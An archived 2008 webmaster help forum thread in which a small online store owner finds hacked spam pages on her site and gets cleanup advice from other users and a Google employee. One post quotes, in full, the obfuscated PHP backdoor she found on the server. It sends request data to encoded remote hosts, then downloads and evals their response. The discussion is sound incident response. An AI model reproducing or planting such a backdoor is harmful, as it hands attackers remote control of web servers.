Web Images Videos Maps News Shopping Gmail more »
Recently Visited Groups | Help | Sign in
Google Groups Home
Discussions > Crawling, indexing, and ranking > Help - has my site been hacked?
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  21 messages - Collapse all  -  Translate all to Translated (View all originals)
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
tobrien  
View profile  
 More options Jul 14 2008, 4:43 pm
From: tobrien
Date: Mon, 14 Jul 2008 13:43:09 -0700 (PDT)
Local: Mon, Jul 14 2008 4:43 pm
Subject: Help - has my site been hacked?
Webmaster tools shows my site has 250 broken links - but these links
are not ones I have put in the site, adn I cannot find them in my
source code. Here are a couple of examples:

http://www.vintageretrolingerie.com/prodimages/1-2-3-%2Fgallery%2F-te...

http://www.vintageretrolingerie.com/prodimages/ADOBE-PHOTO-ALBUM-2-S%...
http://www.vintageretrolingerie.com/prodimages/AVI%2FMPEG%2FASF%2FWMV...

http://www.vintageretrolingerie.com/prodimages/AVI%2FMPEG%2FRM%2FWMV-...

http://www.vintageretrolingerie.com/prodimages/AVI-to-VCD%2FSVCD%2FDV...

How can I find these so I can clean them out?  many thanks!


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Autocrat  
View profile  
 More options Jul 14 2008, 5:17 pm
From: Autocrat
Date: Mon, 14 Jul 2008 14:17:30 -0700 (PDT)
Local: Mon, Jul 14 2008 5:17 pm
Subject: Re: Help - has my site been hacked?
It could be links pointing to your site?

They seem to be the same type of 'spam' (porn links and software rips)


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
lots0  
View profile  
(1 user)  More options Jul 14 2008, 6:28 pm
From: lots0
Date: Mon, 14 Jul 2008 15:28:41 -0700 (PDT)
Local: Mon, Jul 14 2008 6:28 pm
Subject: Re: Help - has my site been hacked?
Try SiteScout.net, I believe they offer a free bad ware evaluation of
your site.
They also give some perdy good info on how to remove the badware.

And nope I am not affilaited with them, I'm just a satisified
customer.

On Jul 14, 2:43 pm, tobrien wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
JohnMu Google employee  
View profile  
 More options Jul 14 2008, 7:20 pm
From: JohnMu
Date: Mon, 14 Jul 2008 16:20:36 -0700 (PDT)
Local: Mon, Jul 14 2008 7:20 pm
Subject: Re: Help - has my site been hacked?
Hi Therese

It does look like this content is coming from your site... For
instance, I'm looking at the URL:
http://www.vintageretrolingerie. com/prodimages/license-code-im-dvd-
creator.html

This URL shows content matching the "subject" meta tag used there:
"license code im dvd creator, cm 03/04 free download patch, Fullmetal
Alchemist Ready Steady Go free Mp3 Downloads, free downloads for grand
theft auto sanandres pc, Maplestory hacks Apache download, juegos emu
v2.com, photoshop cs2 keygen and download instructions free,
application security software web"

You can find some more of these URLs by searching for [site:http://
www.vintageretrolingerie.com/prodimages/]
http://www.google.com/search?q=site:http://www.vintageretrolingerie.c...

It appears that your normal content is not found in this folder. If
that is the case, you can probably use a robots.txt disallow directive
to block the crawling of this subdirectory while you chase down what
is happening on your server.

Strangely, it appears that I cannot access that URL on your site any
more. If you have not changed anything, I would recommend that you
contact your hoster for assistance.

Hope it helps!
John


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Dave Hybrid  
View profile  
(5 users)  More options Jul 14 2008, 7:42 pm
From: Dave Hybrid
Date: Mon, 14 Jul 2008 16:42:26 -0700 (PDT)
Local: Mon, Jul 14 2008 7:42 pm
Subject: Re: Help - has my site been hacked?
Apologies for hijacking but I'm getting desperate, John I would
appreciate your opinion on my massive traffic loss / penalty here:

http://groups.google.com/group/Google_Webmaster_Help-Indexing/browse_...

On Jul 15, 12:20 am, JohnMu wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 14 2008, 9:06 pm
From: tobrien
Date: Mon, 14 Jul 2008 18:06:22 -0700 (PDT)
Local: Mon, Jul 14 2008 9:06 pm
Subject: Re: Help - has my site been hacked?
Thanks for your help.  This folder does contain images for the store -
I've searched it and cannot find anything suspicious - the only files
shown there are our own images, no html files at all. I'm
mystified......

Every sale is failing to complete, which is disastrous. The customers
tell us that they get a "try again later" message when they try to
checkout thru Paypal.

I've sent a Help request to my hosting company, but no reply so far.
They're usually pretty responsive, so that surprises me.  I'll have to
try them again.

Thanks so much for the response.

Therese

On Jul 14, 5:20 pm, JohnMu wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 14 2008, 9:46 pm
From: tobrien
Date: Mon, 14 Jul 2008 18:46:00 -0700 (PDT)
Subject: Re: Help - has my site been hacked?
At first, I thoguht so too, but teh google report is showing them as
broken links within the site.  The html files referred to in the link
report don't even exist on the web server. Yet several things actually
show up, liek this http://www.vintageretrolingerie.com/prodimages/simgirl-4.12.html.

It's almost like someone has "hijacked" the domain name or
something........................

On Jul 14, 3:17 pm, Autocrat wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
beussery  
View profile  
 More options Jul 14 2008, 9:56 pm
From: beussery
Date: Mon, 14 Jul 2008 18:56:21 -0700 (PDT)
Local: Mon, Jul 14 2008 9:56 pm
Subject: Re: Help - has my site been hacked?
If you didn't make that page it may be hacked:
http://www.google.com/search?hl=en&rlz=1B3GGGL_enUS278US278&q=site:vi...

On Jul 14, 9:46 pm, tobrien wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 14 2008, 10:29 pm
From: tobrien
Date: Mon, 14 Jul 2008 19:29:43 -0700 (PDT)
Local: Mon, Jul 14 2008 10:29 pm
Subject: Re: Help - has my site been hacked?
Not only did I not make it, I can't even find it on the web server.
I've been comparng files from my original posting and I found 3 PHP
files that didn't exist back then.  2 are in the prodimages folder
(the problematic folder- I don't know much PHP, so I'm a bit
suspicious about them.  Just in case anyone out there can make sense
of it, here's the code in the latest one:

? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
$_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] :
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ?
$_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] :
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
$_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] :
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
$_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] :
$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?
$_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base 64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode ($g).".".base64_encode($h).".
$s.".base64_encode($i).".".base64_encode($j); if
((include(base64_decode("aHR0cDovL3d3dzMucGhwdGFncy53cw==")."/?".
$str))){} else if
(include(base64_decode("aHR0cDovL3Nob3Audm1hcmtldC5pbmZv")."/?".
$str));else if
($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").
$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3 MvPw==").
$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

Many thanks to all who have responded!

Therese

On Jul 14, 7:56 pm, beussery wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
webado  
View profile  
 More options Jul 14 2008, 10:55 pm
From: webado
Date: Mon, 14 Jul 2008 19:55:07 -0700 (PDT)
Local: Mon, Jul 14 2008 10:55 pm
Subject: Re: Help - has my site been hacked?
I don't know what that does, but it can't be good. I'd get rid of it.
And change all passwords.

On Jul 14, 10:29 pm, tobrien wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
beussery  
View profile  
(1 user)  More options Jul 14 2008, 11:09 pm
From: beussery
Date: Mon, 14 Jul 2008 20:09:59 -0700 (PDT)
Local: Mon, Jul 14 2008 11:09 pm
Subject: Re: Help - has my site been hacked?
You might also check code in your pages, something may be calling the
php you've posted.  Is there a database on your site?  If so you might
change it's password as well....

On Jul 14, 10:29 pm, tobrien wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 14 2008, 11:12 pm
From: tobrien
Date: Mon, 14 Jul 2008 20:12:11 -0700 (PDT)
Local: Mon, Jul 14 2008 11:12 pm
Subject: Re: Help - has my site been hacked?
I've deleted all 3 - but kept a copy on my local machine, just in
case.....................and changed the passwords too.

I really appreciate your help - PHP is /greek to me, the only thing I
know is I didn;t put it there!

Therese

On Jul 14, 8:55 pm, webado wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
webado  
View profile  
 More options Jul 14 2008, 11:18 pm
From: webado
Date: Mon, 14 Jul 2008 20:18:45 -0700 (PDT)
Local: Mon, Jul 14 2008 11:18 pm
Subject: Re: Help - has my site been hacked?
Download your entie website (all the folders and their contents) to
yrou pc. Install a free program called Agent Ransack. You can find a
free version at
http://www.mythicsoft.com/Page.aspx?type=filelocatorpro&page=home

Run Agent  Ransack and let it search the local copy of your site for
any reference to that script.

On Jul 14, 11:12 pm, tobrien wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 14 2008, 11:22 pm
From: tobrien
Date: Mon, 14 Jul 2008 20:22:35 -0700 (PDT)
Local: Mon, Jul 14 2008 11:22 pm
Subject: Re: Help - has my site been hacked?
Great idea! There's a lot of PHP involved in the shopping cart end of
things, so it would be dead easy to conceal a call to a "foreign"
one.

Thanks!

Therese

On Jul 14, 9:09 pm, beussery wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
JohnMu Google employee  
View profile  
(2 users)  More options Jul 15 2008, 4:27 am
From: JohnMu
Date: Tue, 15 Jul 2008 01:27:58 -0700 (PDT)
Local: Tues, Jul 15 2008 4:27 am
Subject: Re: Help - has my site been hacked?
Hi Therese

The code that you posted here downloads and executes content from
various sites based on information provided by your server. In other
words, it allows other people to have almost full control over your
webserver. Great job on finding and removing it!

John


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 15 2008, 12:38 pm
From: tobrien
Date: Tue, 15 Jul 2008 09:38:47 -0700 (PDT)
Local: Tues, Jul 15 2008 12:38 pm
Subject: Re: Help - has my site been hacked?
Thanks, John - I'm SO relieved.  My poor sister's income took an awful
nosedive, as her site moved from page 1 to page 2. Hopefully, she'll
start moving up again and get her store back to normal.

Thanks to everyone for all the help and suggestions!!

Just in case someone else out there has been hit by the same hacker,
look for .php files with a numerical file name, like 49875.php, in the
folder that seems to be dishing up the dirt.

Therese

On Jul 15, 2:27 am, JohnMu wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 22 2008, 12:00 pm
From: tobrien
Date: Tue, 22 Jul 2008 09:00:56 -0700 (PDT)
Local: Tues, Jul 22 2008 12:00 pm
Subject: Re: Help - has my site been hacked?
Well, looks like we're not out of the woods yet!  Google crawled on
Jul 15 and found 4091 "broken links" in the site. I've checked the
folder that the broken links are reported in, and nothing unusual is
lurking there - just jpeg files. I don't know where to begin - is
there anywhere I can get some advice?

Thanks,

Therese

On Jul 15, 2:27 am, JohnMu wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 22 2008, 1:23 pm
From: tobrien
Date: Tue, 22 Jul 2008 10:23:31 -0700 (PDT)
Local: Tues, Jul 22 2008 1:23 pm
Subject: Re: Help - has my site been hacked?
had an idea and searched the entire site for any file dated the same
as the foreign files I originally found - 3 more foreign files were
hidden deep in sub directories - now deleted, so let's hope that's
it.  Will know when Google next crawls the site next week.....

Therese

On Jul 22, 10:00 am, tobrien wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
JohnMu Google employee  
View profile  
 More options Jul 22 2008, 5:32 pm
From: JohnMu
Date: Tue, 22 Jul 2008 14:32:31 -0700 (PDT)
Local: Tues, Jul 22 2008 5:32 pm
Subject: Re: Help - has my site been hacked?
Hi Therese
It's good to see you cleaning out all the leftovers :). I wouldn't
worry about those broken links, they're probably pointing to the bad
content that you have since removed -- so it's good to see that they
are being reported as broken.

Hope it helps!
John


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tobrien  
View profile  
 More options Jul 23 2008, 1:53 pm
From: tobrien
Date: Wed, 23 Jul 2008 10:53:32 -0700 (PDT)
Local: Wed, Jul 23 2008 1:53 pm
Subject: Re: Help - has my site been hacked?
Thanks, John.  Will the large number of broken links affect the search
engine results at all? The number peaked at 4800+, which is a bit
scary....

Therese

On Jul 22, 3:32 pm, JohnMu wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
JohnMu Google employee  
View profile  
 More options Jul 23 2008, 5:56 pm
From: JohnMu
Date: Wed, 23 Jul 2008 14:56:51 -0700 (PDT)
Local: Wed, Jul 23 2008 5:56 pm
Subject: Re: Help - has my site been hacked?
Hi Therese

In general those broken links will not negatively affect your site's
crawling, indexing and ranking. It's possible that we will try to
crawl these URLs for a bit, but that should not change anything else
for your site.

Hope it helps!
John


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
End of messages
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2009 Google